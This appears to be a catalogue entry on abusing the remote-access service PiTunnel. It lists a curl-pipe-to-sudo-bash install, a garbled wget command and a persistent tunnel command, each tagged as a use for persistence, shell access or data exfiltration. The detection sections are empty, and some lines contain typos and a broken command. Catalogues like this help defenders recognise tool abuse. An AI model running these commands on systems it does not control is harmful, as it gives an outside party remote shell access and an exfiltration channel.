.. /PiTunnel
Star

Access
Shell Access
Exfiltration

PiTunnel is free/subscription based tool which enables connecting local systems to dataplicity cloud for remotely accessing them over the internet.

Paths:

Resources:

Acknowledgements:

Detections:

Access

  1. Having an account created on the website, it is possible to connect any system to the PiTunnel cloud and access it remotely, keeping access over tunnels.

    curl -s https://pitunnel.com/get/<TOKEN> | sudo bash
    Use case
    Connecting the user machine to Pitunnl keeping access over tunnels.
    Privileges required
    User
    Operating systems
    RaspberryPi

Shell Access

  1. Having an account created on the website, it is possible to connect any system to the PiTunnel cloud and access it remotely, for shell-access.

    wget -qO- https://pitunnel.com/get/<TOKEN>> | sudo
    Use case
    Connecting the user machine to PiTunnel cloud for data exfiltration.
    Privileges required
    User
    Operating systems
    RaspberryPi

Exfiltration

  1. Having an account created on the website, it is possible to connect any system to the PiTunnel cloud and access it remotely, for data exfiltration.

    pitunnel --port=<PORT> --name=vnc --persist
    Use case
    Connecting the user machine to PiTunnel cloud for data exfiltration.
    Privileges required
    User
    Operating systems
    RaspberryPi